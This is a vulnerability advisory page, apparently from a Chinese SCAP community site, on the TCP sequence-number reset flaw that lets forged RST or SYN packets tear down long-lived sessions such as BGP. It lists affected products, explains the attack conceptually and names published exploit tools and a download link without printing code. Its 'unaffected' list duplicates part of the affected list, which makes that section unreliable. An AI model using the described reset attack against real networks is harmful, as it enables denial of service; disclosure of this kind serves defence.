Cisco Catalyst 2948G-GE-TX
Cisco Catalyst 2948G
Cisco Catalyst 2920
Cisco Catalyst 2900 XL
Cisco Catalyst 2900 LRE XL
Cisco Catalyst 2900 12.0 (5.2)XU
Cisco Catalyst 2900 11.2 (8.2)SA6
Cisco Catalyst 2900 6.1 (3)
Cisco Catalyst 2900 6.1 (2)
Cisco Catalyst 2900 5.5 (7)
Cisco Catalyst 2900 5.5 (6)
Cisco Catalyst 2900 4.5 (12)
Cisco Catalyst 2900 4.5 (11)
Cisco Catalyst 2900
Cisco Catalyst 2820
Cisco Catalyst 2800
Cisco Catalyst 1900
Cisco Catalyst 1200
Cisco Call Manager 4.0
Cisco Call Manager 3.3 (3)
Cisco Call Manager 3.3
Cisco Call Manager 3.2
Cisco Call Manager 3.1 (3a)
Cisco Call Manager 3.1 (2)
Cisco Call Manager 3.1
Cisco Call Manager 3.0
Cisco Call Manager 2.0
Cisco Call Manager 1.0
Cisco Call Manager
Cisco Cache Engine 570 4.1
Cisco Cache Engine 570 4.0
Cisco Cache Engine 570 3.0
Cisco Cache Engine 570 2.2 .0
Cisco Cache Engine 570
Cisco Cache Engine 505 4.1
Cisco Cache Engine 505 4.0
Cisco Cache Engine 505 3.0
Cisco Cache Engine 505 2.2 .0
Cisco Cache Engine 505
Cisco BR350
Cisco BR340
Cisco BPX/IGX
Cisco BPX 8600
Cisco BPX
Cisco Application & Content Networking Software (ACNS)
Cisco AP350
Cisco AP340
Cisco Access Registrar
Cisco 8950 Wan Switch
Cisco 8110 Broadband Network Termination Unit
Check Point Software VPN-1 VSX NG with Application Intelligence
Check Point Software VPN-1 Next Generation FP2
Check Point Software VPN-1 Next Generation FP1
Check Point Software VPN-1 Next Generation FP0
Check Point Software VPN-1 4.1 SP6
Check Point Software VPN-1 4.1 SP5a
Check Point Software VPN-1 4.1 SP5
Check Point Software VPN-1 4.1 SP4
Check Point Software VPN-1 4.1 SP3
Check Point Software VPN-1 4.1 SP2
Check Point Software VPN-1 4.1 SP1
Check Point Software VPN-1 4.1
Check Point Software VPN-1 FP1
Check Point Software SecurePlatform NG FP2 Edition 2
Check Point Software SecurePlatform NG FP2
Check Point Software SecurePlatform NG FP1
Check Point Software SecurePlatform NG
Check Point Software FireWall-1 VSX NG with Application Intelligence
Check Point Software FireWall-1 Next Generation FP2
Check Point Software FireWall-1 Next Generation FP1
Check Point Software FireWall-1 Next Generation FP0
Check Point Software FireWall-1 GX 2.0
Check Point Software Firewall-1 [ VPN + DES ] 4.1
Check Point Software Firewall-1 [ VPN + DES + STRONG ] 4.1 SP2 Build 41716
Check Point Software Firewall-1 [ VPN + DES + STRONG ] 4.1 Build 41439
Check Point Software Firewall-1 4.1 SP6
Check Point Software Firewall-1 4.1 SP5a
Check Point Software Firewall-1 4.1 SP5
Check Point Software Firewall-1 4.1 SP4
Check Point Software Firewall-1 4.1 SP3
Check Point Software Firewall-1 4.1 SP2
Check Point Software Firewall-1 4.1 SP1
Check Point Software Firewall-1 4.1
Check Point Software Firewall-1 4.0 SP8
Check Point Software Firewall-1 4.0 SP7
Check Point Software Firewall-1 4.0 SP6
Check Point Software Firewall-1 4.0 SP5
Check Point Software Firewall-1 4.0 SP4
Check Point Software Firewall-1 4.0 SP3
Check Point Software Firewall-1 4.0 SP2
Check Point Software Firewall-1 4.0 SP1
Check Point Software Firewall-1 4.0
Check Point Software Firewall-1 3.0
Blue Coat Systems Security Gateway OS 3.1.2
Blue Coat Systems Security Gateway OS 3.1
Blue Coat Systems Security Gateway OS 3.0
Blue Coat Systems Security Gateway OS 2.1.5001 SP1
Blue Coat Systems Security Gateway OS 2.1.10
Blue Coat Systems Security Gateway OS 2.1.9
Blue Coat Systems Security Gateway OS 2.0
Blue Coat Systems CacheOS CA/SA 4.1.12
Blue Coat Systems CacheOS CA/SA 4.1.10
Avaya Modular Messaging (MAS) 3.0
Avaya Intuity Audix R5 0
Cisco VPN 3080 Concentrator
Cisco VPN 3060 Concentrator
Cisco VPN 3030 Concentrator
Cisco VPN 3015 Concentrator
Cisco VPN 3005 Concentrator 4.0.1
Cisco VPN 3005 Concentrator 4.0
Cisco VPN 3005 Concentrator 3.6.7 F
Cisco VPN 3005 Concentrator 3.6.7 D
Cisco VPN 3005 Concentrator 3.6.7 C
Cisco VPN 3005 Concentrator 3.6.7 B
Cisco VPN 3005 Concentrator 3.6.7 A
Cisco VPN 3005 Concentrator 3.6.7
Cisco VPN 3005 Concentrator 3.6.5
Cisco VPN 3005 Concentrator 3.6.3
Cisco VPN 3002 Hardware Client
Cisco VPN 3000 Concentrator 4.0.1
Cisco VPN 3000 Concentrator 4.0 .x
Cisco VPN 3000 Concentrator 4.0
Cisco VPN 3000 Concentrator 3.6.7 D
Cisco VPN 3000 Concentrator 3.6.7
Cisco VPN 3000 Concentrator 3.6.1
Cisco VPN 3000 Concentrator 3.6
Cisco VPN 3000 Concentrator 3.5.5
Cisco VPN 3000 Concentrator 3.5.4
Cisco VPN 3000 Concentrator 3.5.3
Cisco VPN 3000 Concentrator 3.5.2
Cisco VPN 3000 Concentrator 3.5.1
Cisco VPN 3000 Concentrator 3.5 (Rel)
Cisco VPN 3000 Concentrator 3.1.4
Cisco VPN 3000 Concentrator 3.1.2
Cisco VPN 3000 Concentrator 3.1.1
Cisco VPN 3000 Concentrator 3.1 (Rel)
Cisco VPN 3000 Concentrator 3.1
Cisco VPN 3000 Concentrator 3.0.4
Cisco VPN 3000 Concentrator 3.0.3 (B)
Cisco VPN 3000 Concentrator 3.0.3 (A)
Cisco VPN 3000 Concentrator 3.0
Cisco VPN 3000 Concentrator 3.0
Cisco VPN 3000 Concentrator 2.5.2 (F)
Cisco VPN 3000 Concentrator 2.5.2 (D)
Cisco VPN 3000 Concentrator 2.5.2 (C)
Cisco VPN 3000 Concentrator 2.5.2 (B)
Cisco VPN 3000 Concentrator 2.5.2 (A)
Cisco VPN 3000 Concentrator 2.0
Cisco PIX Firewall 6.3.3 (133)
Cisco PIX Firewall 6.2.3 (110)
Cisco PIX Firewall 6.1.5 (104)
Cisco ONS 15454 Optical Transport Platform 4.14
Cisco ONS 15327 4.14
Cisco MDS 9000 1.3 (4a)
Cisco Local Director 4.2 (6)
Cisco Local Director 4.2 (5)
Cisco Local Director 4.2 (4)
Cisco Local Director 4.2 (3)
Cisco Local Director 4.2 (2)
Cisco Local Director 4.2 (1)
Cisco IOS 12.3(6)
Cisco IOS 12.2JA
Cisco IOS 12.2(23)
Cisco IOS 12.2(22)S
Cisco IOS 12.0(5)XN1
Cisco IOS 12.0(28)
Cisco IOS 12.0(27)S
Cisco FWSM for Cisco Catalyst 6500/7600 Series 1.1 (3.17)
Cisco FWSM for Cisco Catalyst 6500/7600 Series
Cisco CSS11500 Content Services Switch 7.30 (00.09)S
Cisco CSS11500 Content Services Switch 7.30 (00.08)S
Cisco CSS11500 Content Services Switch 7.20 (03.10)S
Cisco CSS11500 Content Services Switch 7.20 (03.09)S
Cisco CSS11500 Content Services Switch 7.10 (05.07)S
Cisco Catalyst 6500 Series SSL Services Module 2.1 (2)
Cisco Catalyst 2820 9.0 0.07
Cisco Catalyst 1900 9.0 0.07

- 不受影响的程序版本

Cisco VPN 3080 Concentrator
Cisco VPN 3060 Concentrator
Cisco VPN 3030 Concentrator
Cisco VPN 3015 Concentrator
Cisco VPN 3005 Concentrator 4.0.1
Cisco VPN 3005 Concentrator 4.0
Cisco VPN 3005 Concentrator 3.6.7 F
Cisco VPN 3005 Concentrator 3.6.7 D
Cisco VPN 3005 Concentrator 3.6.7 C
Cisco VPN 3005 Concentrator 3.6.7 B
Cisco VPN 3005 Concentrator 3.6.7 A
Cisco VPN 3005 Concentrator 3.6.7
Cisco VPN 3005 Concentrator 3.6.5
Cisco VPN 3005 Concentrator 3.6.3
Cisco VPN 3002 Hardware Client
Cisco VPN 3000 Concentrator 4.0.1
Cisco VPN 3000 Concentrator 4.0 .x
Cisco VPN 3000 Concentrator 4.0
Cisco VPN 3000 Concentrator 3.6.7 D
Cisco VPN 3000 Concentrator 3.6.7
Cisco VPN 3000 Concentrator 3.6.1
Cisco VPN 3000 Concentrator 3.6
Cisco VPN 3000 Concentrator 3.5.5
Cisco VPN 3000 Concentrator 3.5.4
Cisco VPN 3000 Concentrator 3.5.3
Cisco VPN 3000 Concentrator 3.5.2
Cisco VPN 3000 Concentrator 3.5.1
Cisco VPN 3000 Concentrator 3.5 (Rel)
Cisco VPN 3000 Concentrator 3.1.4
Cisco VPN 3000 Concentrator 3.1.2
Cisco VPN 3000 Concentrator 3.1.1
Cisco VPN 3000 Concentrator 3.1 (Rel)
Cisco VPN 3000 Concentrator 3.1
Cisco VPN 3000 Concentrator 3.0.4
Cisco VPN 3000 Concentrator 3.0.3 (B)
Cisco VPN 3000 Concentrator 3.0.3 (A)
Cisco VPN 3000 Concentrator 3.0
Cisco VPN 3000 Concentrator 3.0
Cisco VPN 3000 Concentrator 2.5.2 (F)
Cisco VPN 3000 Concentrator 2.5.2 (D)
Cisco VPN 3000 Concentrator 2.5.2 (C)
Cisco VPN 3000 Concentrator 2.5.2 (B)
Cisco VPN 3000 Concentrator 2.5.2 (A)
Cisco VPN 3000 Concentrator 2.0
Cisco PIX Firewall 6.3.3 (133)
Cisco PIX Firewall 6.2.3 (110)
Cisco PIX Firewall 6.1.5 (104)
Cisco ONS 15454 Optical Transport Platform 4.14
Cisco ONS 15327 4.14
Cisco MDS 9000 1.3 (4a)
Cisco Local Director 4.2 (6)
Cisco Local Director 4.2 (5)
Cisco Local Director 4.2 (4)
Cisco Local Director 4.2 (3)
Cisco Local Director 4.2 (2)
Cisco Local Director 4.2 (1)
Cisco IOS 12.3(6)
Cisco IOS 12.2JA
Cisco IOS 12.2(23)
Cisco IOS 12.2(22)S
Cisco IOS 12.0(5)XN1
Cisco IOS 12.0(28)
Cisco IOS 12.0(27)S
Cisco FWSM for Cisco Catalyst 6500/7600 Series 1.1 (3.17)
Cisco FWSM for Cisco Catalyst 6500/7600 Series
Cisco CSS11500 Content Services Switch 7.30 (00.09)S
Cisco CSS11500 Content Services Switch 7.30 (00.08)S
Cisco CSS11500 Content Services Switch 7.20 (03.10)S
Cisco CSS11500 Content Services Switch 7.20 (03.09)S
Cisco CSS11500 Content Services Switch 7.10 (05.07)S
Cisco Catalyst 6500 Series SSL Services Module 2.1 (2)
Cisco Catalyst 2820 9.0 0.07
Cisco Catalyst 1900 9.0 0.07

- 漏洞讨论

A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers.

The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port.

Few factors may present viable target implementations, such as imlementations that:

- depend on long-lived TCP connections
- have known or easily guessed IP address endpoints
- have known or easily guessed TCP source ports.

Note that Border Gateway Protocol (BGP) is reported to be particularly vulnerable to this type of attack. As a result, this issue is likely to affect a number of routing platforms.

Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further.

Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed.

**Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Connections that involve persistent sessions, for example Border Gateway Protocol sessions, may be more exposed to this vulnerability than other TCP/IP sessions.

- 漏洞利用

The proof-of-concept code developed by Paul Watson is available (SlippingInTheWindow.tgz).

The researchers who discovered this issue have demonstrated that it is exploitable on some implementations.

The following exploit script for this issue has been provided:

http://www.k-otik.com/exploits/04222004.reset.dpr.php

A Perl script targetting BGP specifically is also available (bgp-dosv2.pl).

A Perl exploit was released (Kreset.pl).

Exploit code written by Matt Edman has been released (autoRST.c).

- 解决方案

Please see the referenced advisories for more information on obtaining and applying fixes.


Microsoft Windows XP Professional

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

Microsoft Windows XP Professional x64 Edition

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站